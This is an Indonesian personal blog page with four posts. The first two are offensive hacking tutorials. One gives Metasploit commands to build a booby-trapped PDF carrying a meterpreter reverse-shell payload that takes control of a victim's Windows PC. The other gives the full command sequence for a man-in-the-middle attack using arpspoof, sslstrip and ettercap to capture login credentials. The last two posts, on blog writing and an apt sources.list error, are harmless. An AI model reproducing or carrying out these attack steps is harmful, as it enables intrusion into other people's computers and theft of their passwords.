Rabu, 08 Februari 2017

Exploit Windows Dengan File PDF

Kali ini saya akan memberikan tutorial exploit windows menggunakan file pdf dengan menggunakan metasploit, fungsi dari exploit adalah salah satu cara untuk masuk ke sistem korban dengan cara menanamkan backdoor berupa file pdf

Pada tutorial kali ini saya menggunakan kali linux sana dan korban menggunakan windows 7 64 bit, oke langsung saja kita praktek

Langkah pertama adalah ketikkan perintah "service postgresql start"
Masuk ke console metasploit dengan perintah "msfconsole"

Pilih exploit apa yang akan kita gunakan, kali ini saya ingin membuat exploit berupa file pdf, ketikkan "use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs"
Lalu "set payload windows/meterpreter/reverse_tcp"
Kita set nama payload yang akan kita buat "set filename Bigboss.web.id.pdf"
Set port yang akan kita gunakan "set lport 443"
Set IP yang kita gunakan (IP Attacker) "set lhost 192.168.1.100"
Lalu kita buat exploitnya
Selanjutnya kita ambil file expliot yang sudah kita buat tadi, pada contoh lokasi exploit yang saya buat ada di direktori "/root/.msf4/local" dengan nama file "Bigboss.web.id.pdf"
Lalu kembali buka metasploit dan ketikkan perintah "use exploit/multi/handler"
Set payloadnya "set payload windows/meterpreter/reverse_tcp"
Set portnya "set lport 443"
Set IP kita (Attacker) "set lhost 192.168.1.100"
Lalu jalankan exploit dan tunggu hingga korban membuka file pdf yang telah kita siapkan
Jika korban telah membuka file tersebut maka kita sudah dapat mengakses dan melakukan apapun yang kita mau ke komputer korban, pada kasus ini saya berhasil masuk dan berada di direktori E: korban
Bukti kita telah dapat mengakses sistem korban dan dapat melihat isi dari drive C:
Sekian tutorial exploit kali ini, untuk selanjutnya masih banyak yang bisa kita lakukan mulai dari mengambil file ataupun menjalankan dan mematikan semua program yang terpasang di komputer korban dengan perintah metasploit lainnya

Rabu, 18 Januari 2017

Mengintip User dan Password Dengan Teknik MITM

Apakah MITM itu ? Man In The Middle Attack biasa disingkat MITM adalah salah satu metode serangan yang biasa digunakan oleh para hacker yang menyerang dalam sebuah jaringan dengan cara menempatkan diri diantara pengguna lain dan juga jaringan yang digunakan itu sendiri

Pada contoh kali ini saya akan mencoba menyerang korban di sebuah jaringan yang terkoneksi oleh komputer saya dan juga komputer korban yang bertujuan untuk mendapatkan username dan password saat korban browsing

Langkah pertama adalah edit terlebih dahulu file konfigurasi ettercap dengan perintah "leafpad /etc/ettercap/etter.conf"
 Lalu cari "# if you use iptables" dan ubah menjadi seperti ini
Kemudian aktifkan terlebih dahulu IP forward dengan perintah "echo 1 > /proc/sys/net/ipv4/ip_forward"
Setelah itu kita redirect port 80 ke port 10000 agar koneksi korban mengarah keport yang kita inginkan dengan perintah "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"
Lalu kita cek ip gateway dan juga ip kita pada jaringan tersebut dengan perintah "route -n"
Lalu ketikkan perintah "arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1"
Keterangan :
  • wlan 0 : interface yang kita gunakan
  • 192.168.1.100 : ip kita (attacker)
  • 192.168.1.1 : ip gateway (jaringan)

 Selanjutnya kita jalan sslstrip di terminal baru dengan perintah "sslstrip -akf"
Buka terminal lagi untuk menjalankan sniffing dengan perintah "ettercap -T -q -i wlan0 -M arp ///"
Tunggu hingga korban melakukan aktivitas browsing, jika target login ke sebuah web maka akan berhasil seperti ini
Pada gambar diatas saya sukses mengintip salah satu aktivitas browsing korban yaitu korban login ke situs copyscape.com dengan menggunakan username Bigboss.web.id dan passwornya adalah miftah

Selasa, 03 Januari 2017

Artikel Original Adalah Syarat Membangun Blog Berkualitas

Banyak mungkin pertanyaan yang sering kita tanyakan pda Blogger lain, teman sesama blogger, bahkan yang dibilang master sekalipun. Pertanyaan tersebut adalah "bagaimana agar blog ramai pengunjung?" mungkin hampir setiap hari pertanyaan itu terdengar di berbagai grup yang membahas tentang dunia blogging.



Pertanyaan diatas menurut saya jawabannya hanya satu yaitu "Konten yang Berkualitas" yap karena konten adalah syarat mutlak agar blog dapat bertahan ditengah persaingan blogging yang semakin hari semakin ramai dengan datangnya ratusan blogger baru setiap harinya.

"Mengapa Konten yang Berkualitas???" oke, kita ambil contoh sederhana saja. dulu saat pertama terjun di dunia ngeblog saya berpikir bahwa semakin banyak artikel yang kita posting maka akan semakin bagus blog kita dimata Search Engine, karena saya berpikir seperti itu saya sibuk copas sana sini setiap harinya hingga artikel di blog saya banyak.

Namun ternyata salah 100%, beberapa bulan kemudian dikarenakan Google melakukan update algoritma, blog yang tadinya bisa dibilang Ramai Pengunjung seketika berubah menjadi blog yang Sepi Pengunjung dan otomatis earning pun turun drastis. bukan hanya itu, ternyata tidak lama kemudian blog tersebut dianggap SPAM oleh Google dan blog tersebut pun hilang dari permukaan bumi ini.

Jelas bukan, dari latar belakang diatas kita dapat mengambil kesimpulan walaupun sedikit artikel yang ada di dalam suatu blog bukan berarti blog tersebut akan dijauhi oleh Search Engine, namun keaslian tulisan lah yang menjadi bahan pertimbahan Search Engine dalam mengindex artikel yang ada pada blog kita.

Rabu, 10 Februari 2016

Cara Megatasi Error E:Type '' is Not Known on Line * in Source List /etc/apt/sources.list

Jika anda pengguna linux dan sedang menemui masalah berupa pesan error "cara megatasi error E:Type '' is not known on line * in source list /etc/apt/sources.list" berikut adalah cara yang saya telah coba agar dapat mengatasi error tersebut

Berikut adalah pesan error yang saya dapat saat tengah mencoba update

Buka repositori yang kita gunakan

Lalu kita copy semua repo tersebut

Lakukan perintah update kembali

Jika masih belum bisa, kita gunakan perintah cat untuk menampilkan source list kita setelah itu kita copy kan ke file source.list

Kemudian kembali lakukan perintah update dan update akan kembali berjalan normal, hal tersebut sukses saya lakukan pada kali sana 2.0